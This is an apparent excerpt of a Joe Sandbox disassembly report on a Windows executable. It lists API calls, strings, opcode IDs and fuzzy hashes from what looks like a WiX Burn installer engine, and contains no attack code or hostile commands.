                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                    • Opcode ID: 037bcc91f1acb0aba7250c255d4e63858416682d402340b46fd7db470a6cebf7
                                                                                                                                                                    • Instruction ID: 91f7bed62492d85dedafe81996948a4470f458ac14328ce36ff8e7b31e0eabf7
                                                                                                                                                                    • Opcode Fuzzy Hash: 037bcc91f1acb0aba7250c255d4e63858416682d402340b46fd7db470a6cebf7
                                                                                                                                                                    • Instruction Fuzzy Hash: E0E0FEB293E679DE8B109F69FD54A427BB8B719B60344425FF805C2230E7F18481AFA0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094966B
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    • Opcode ID: e72580834cb86549794df86e2a687678b3e76cc3f90499ad6b4eb4391ac9f1bc
                                                                                                                                                                    • Instruction ID: a4d6f72b2998386c3271d9e09feda5bd14d1b864c85a5c5fd40a530e5f50ff58
                                                                                                                                                                    • Opcode Fuzzy Hash: e72580834cb86549794df86e2a687678b3e76cc3f90499ad6b4eb4391ac9f1bc
                                                                                                                                                                    • Instruction Fuzzy Hash: 49B012912783016C3A5492482F53D37014CC7C0B51331461EF000E1040E8440C060532
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094966B
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    • Opcode ID: edc430f63569087ceddbe0e4f37e33b8fecd5f014c49b0ee7f280510deede217
                                                                                                                                                                    • Instruction ID: fce78d7b8876957f00acefbd888973b463fa8b619622180634719352f7219f37
                                                                                                                                                                    • Opcode Fuzzy Hash: edc430f63569087ceddbe0e4f37e33b8fecd5f014c49b0ee7f280510deede217
                                                                                                                                                                    • Instruction Fuzzy Hash: 66B012912782017C3B1452046D82C37010CC7C0B51331861EF000F0040E8400C050233
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094966B
                                                                                                                                                                      • Part of subcall function 0094998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00949A09
                                                                                                                                                                      • Part of subcall function 0094998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00949A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    • Opcode ID: 8921c6e78b7b710a77c56e9d858f60ab46019755e778664c3799fed29aaefa2b
                                                                                                                                                                    • Instruction ID: ddafbdafd6d270c32d823829247f890121dfd4291d978ac42c079f93a1967184
                                                                                                                                                                    • Opcode Fuzzy Hash: 8921c6e78b7b710a77c56e9d858f60ab46019755e778664c3799fed29aaefa2b
                                                                                                                                                                    • Instruction Fuzzy Hash: D0B012912781026C365492081C03D37014CC3C0B11331C61EF400D1040E8401C090132
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,009021A8,?,00000000,?,00000000,?,0090390C,00000000,?,00000104), ref: 009014E8
                                                                                                                                                                      • Part of subcall function 00903BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BDB
                                                                                                                                                                      • Part of subcall function 00903BD3: HeapSize.KERNEL32(00000000,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BE2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3492610842-0
                                                                                                                                                                    • Opcode ID: 7b5034e93f5287c43924858c8f8005c821b91f1c55a0207dec7e6665017e1596
                                                                                                                                                                    • Instruction ID: 34d7c948e6939c6e4bb8d843b1540454af3d0c2d12a70e6e7d3a217e438899f5
                                                                                                                                                                    • Opcode Fuzzy Hash: 7b5034e93f5287c43924858c8f8005c821b91f1c55a0207dec7e6665017e1596
                                                                                                                                                                    • Instruction Fuzzy Hash: FF01F937200219AFCF115E54DC80F9A77A9AF85754F118219FA165B1F1D6319C009A90
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0090B11C
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,0094CA9C,000000FF,DirectorySearch,000000FF,0094CA9C,Condition,feclient.dll,0094CA9C,Variable,?,0094CA9C,0094CA9C,?,?), ref: 0090AA29
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0090AA7E
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 0090AA9A
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 0090AABE
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0090AB11
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0090AB2B
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 0090AB53
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 0090AB91
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 0090ABB0
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 0090ABCF
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 0090AC8D
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 0090ACA7
                                                                                                                                                                      • Part of subcall function 009432F3: VariantInit.OLEAUT32(?), ref: 00943309
                                                                                                                                                                      • Part of subcall function 009432F3: SysAllocString.OLEAUT32(?), ref: 00943325
                                                                                                                                                                      • Part of subcall function 009432F3: VariantClear.OLEAUT32(?), ref: 009433AC
                                                                                                                                                                      • Part of subcall function 009432F3: SysFreeString.OLEAUT32(00000000), ref: 009433B7
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 0090AD06
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 0090AD28
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0090AD48
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 0090AE20
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0090AFFE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
                                                                                                                                                                    • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$`<u$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
                                                                                                                                                                    • API String ID: 2748437055-56916464
                                                                                                                                                                    • Opcode ID: 99e3baa209f69a24561add080d514ebc366015978024778ab9b3462be3ca2139
                                                                                                                                                                    • Instruction ID: 8c884a5f624849e8d2a04d90181fd53891c3ed3981c0d3ef99b0d7580bda9db4
                                                                                                                                                                    • Opcode Fuzzy Hash: 99e3baa209f69a24561add080d514ebc366015978024778ab9b3462be3ca2139
                                                                                                                                                                    • Instruction Fuzzy Hash: F222D731E49226BEDB218AA48C42F6F7A79AF45738F204750F534B62D4DBB0AE40D7D1
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to add patch properties to argument string., xrefs: 009244FD
                                                                                                                                                                    • REINSTALL=ALL, xrefs: 009245D3, 0092464D
                                                                                                                                                                    • Failed to initialize external UI handler., xrefs: 009243F4
                                                                                                                                                                    • Failed to add feature action properties to obfuscated argument string., xrefs: 009244DB
                                                                                                                                                                    • %ls %ls=ALL, xrefs: 009246B6, 00924795
                                                                                                                                                                    • Failed to run maintanance mode for MSI package., xrefs: 009246F6
                                                                                                                                                                    • Failed to add obfuscated properties to argument string., xrefs: 00924497
                                                                                                                                                                    • Failed to add reboot suppression property on uninstall., xrefs: 0092477D
                                                                                                                                                                    • Failed to add the list of dependencies to ignore to the properties., xrefs: 009246CA
                                                                                                                                                                    • Failed to get cached path for package: %ls, xrefs: 0092434F
                                                                                                                                                                    • Failed to add ADMIN property on admin install., xrefs: 0092471E
                                                                                                                                                                    • msasn1.dll, xrefs: 0092440B
                                                                                                                                                                    • Failed to add properties to argument string., xrefs: 00924463
                                                                                                                                                                    • REBOOT=ReallySuppress, xrefs: 009245A0, 0092476C
                                                                                                                                                                    • Failed to add reboot suppression property on install., xrefs: 009245BB
                                                                                                                                                                    • Failed to add reinstall all property on minor upgrade., xrefs: 009245EA
                                                                                                                                                                    • VersionString, xrefs: 0092428E, 009242EF
                                                                                                                                                                    • Failed to add patch properties to obfuscated argument string., xrefs: 0092451F
                                                                                                                                                                    • ACTION=ADMIN, xrefs: 00924709
                                                                                                                                                                    • Failed to uninstall MSI package., xrefs: 009247EF
                                                                                                                                                                    • REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 009245F5
                                                                                                                                                                    • Failed to add feature action properties to argument string., xrefs: 009244B9
                                                                                                                                                                    • WixBundleExecutePackageCacheFolder, xrefs: 0092436A, 009248A4
                                                                                                                                                                    • crypt32.dll, xrefs: 0092440A
                                                                                                                                                                    • Failed to install MSI package., xrefs: 00924746
                                                                                                                                                                    • IGNOREDEPENDENCIES, xrefs: 009246A5, 00924784
                                                                                                                                                                    • WixBundleExecutePackageAction, xrefs: 009243B7, 009248B4
                                                                                                                                                                    • feclient.dll, xrefs: 009242C5, 0092434D, 0092441D, 0092454B, 009247D8
                                                                                                                                                                    • Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 0092460C
                                                                                                                                                                    • %ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 00924687
                                                                                                                                                                    • Failed to build MSI path., xrefs: 0092439D
                                                                                                                                                                    • Failed to enable logging for package: %ls to: %ls, xrefs: 0092441F
                                                                                                                                                                    • Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 0092469B
                                                                                                                                                                    • Failed to perform minor upgrade of MSI package., xrefs: 00924638
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
                                                                                                                                                                    • API String ID: 0-2033600224
                                                                                                                                                                    • Opcode ID: b9c6d5b483914bde3e17acf09611d961310d77016ab10072482a69b4deb7a770
                                                                                                                                                                    • Instruction ID: 5542b3570d141d8c00cc6bb60224782bccbeec420f822ff00d22075faaab02a6
                                                                                                                                                                    • Opcode Fuzzy Hash: b9c6d5b483914bde3e17acf09611d961310d77016ab10072482a69b4deb7a770
                                                                                                                                                                    • Instruction Fuzzy Hash: 4802CF71A00639AFCB21DF64DC41FA9B7AAFF84704F0101A5F908A7255D732AEA4CF80
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 009417B1
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009417BB
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00941808
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0094180E
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00941848
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0094184E
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 0094188E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941894
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 009418D4
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009418DA
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 0094191A
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941920
                                                                                                                                                                    • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 00941A11
                                                                                                                                                                    • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 00941A4B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941A55
                                                                                                                                                                    • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 00941A8D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941A97
                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00941AD0
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941ADA
                                                                                                                                                                    • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 00941B18
                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00941B2E
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                                                    • String ID: srputil.cpp
                                                                                                                                                                    • API String ID: 267631441-4105181634
                                                                                                                                                                    • Opcode ID: d4d4210259b0b83d714d3c9b9eadf7a23e1edb5d02e66fcf51f61170ca486cbf
                                                                                                                                                                    • Instruction ID: 343482129054bbd06e3e9f949337f7c0539b6470334358300acb12214bec943d
                                                                                                                                                                    • Opcode Fuzzy Hash: d4d4210259b0b83d714d3c9b9eadf7a23e1edb5d02e66fcf51f61170ca486cbf
                                                                                                                                                                    • Instruction Fuzzy Hash: 00C13376D4123DABD7308B969D48FDFFABCAF45750F0105AAAD05B7240E7709D808EA0
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to copy key for pseudo bundle payload., xrefs: 0092C3F3
                                                                                                                                                                    • Failed to allocate memory for dependency providers., xrefs: 0092C6DE
                                                                                                                                                                    • Failed to copy local source path for pseudo bundle., xrefs: 0092C43B
                                                                                                                                                                    • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 0092C385
                                                                                                                                                                    • Failed to append relation type to install arguments for related bundle package, xrefs: 0092C5A9
                                                                                                                                                                    • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0092C3BE
                                                                                                                                                                    • Failed to copy uninstall arguments for related bundle package, xrefs: 0092C623
                                                                                                                                                                    • -%ls, xrefs: 0092C34C
                                                                                                                                                                    • pseudobundle.cpp, xrefs: 0092C379, 0092C3B2, 0092C4A1, 0092C6D2
                                                                                                                                                                    • Failed to copy filename for pseudo bundle., xrefs: 0092C417
                                                                                                                                                                    • Failed to copy cache id for pseudo bundle., xrefs: 0092C55F
                                                                                                                                                                    • Failed to copy key for pseudo bundle., xrefs: 0092C542
                                                                                                                                                                    • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 0092C644
                                                                                                                                                                    • Failed to copy display name for pseudo bundle., xrefs: 0092C74F
                                                                                                                                                                    • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0092C4AD
                                                                                                                                                                    • Failed to copy download source for pseudo bundle., xrefs: 0092C469
                                                                                                                                                                    • Failed to copy install arguments for related bundle package, xrefs: 0092C584
                                                                                                                                                                    • Failed to append relation type to repair arguments for related bundle package, xrefs: 0092C5F1
                                                                                                                                                                    • Failed to copy repair arguments for related bundle package, xrefs: 0092C5D0
                                                                                                                                                                    • Failed to copy version for pseudo bundle., xrefs: 0092C72D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                    • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                                                                                                                                    • API String ID: 1357844191-2832335422
                                                                                                                                                                    • Opcode ID: 8b0095054a1b437a3ec9bb9ae48cbf4725739eff95bf5dc5c211caa235000dff
                                                                                                                                                                    • Instruction ID: 8dc031bf4cc386f1298e2cc01e43b79c0ca3e88b441ba22d1b6644672c041910
                                                                                                                                                                    • Opcode Fuzzy Hash: 8b0095054a1b437a3ec9bb9ae48cbf4725739eff95bf5dc5c211caa235000dff
                                                                                                                                                                    • Instruction Fuzzy Hash: E0C1EFB1A04626BFCB26DF24D895F6E77A9BF48754B004629FD05EB290DB70EC048BD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 00904617
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0090461E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00904628
                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00904678
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00904682
                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 009046C6
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009046D0
                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0090470C
                                                                                                                                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 0090471D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00904727
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0090477D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
                                                                                                                                                                    • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
                                                                                                                                                                    • API String ID: 2241679041-1583736410
                                                                                                                                                                    • Opcode ID: ad0de1f8dd14199a81238e5b17d6c061c36d3d998ebb07f52f62c8ae8f3247f3
                                                                                                                                                                    • Instruction ID: 8e8b166f05e4be56fa3372871541df81859cc650ec20dfad420f7de320510549
                                                                                                                                                                    • Opcode Fuzzy Hash: ad0de1f8dd14199a81238e5b17d6c061c36d3d998ebb07f52f62c8ae8f3247f3
                                                                                                                                                                    • Instruction Fuzzy Hash: E941E9B7A51239BFDB209BA99C4AF6F765CAB42B55F110125FF00FB1C0E7658C0096E1
                                                                                                                                                                    APIs
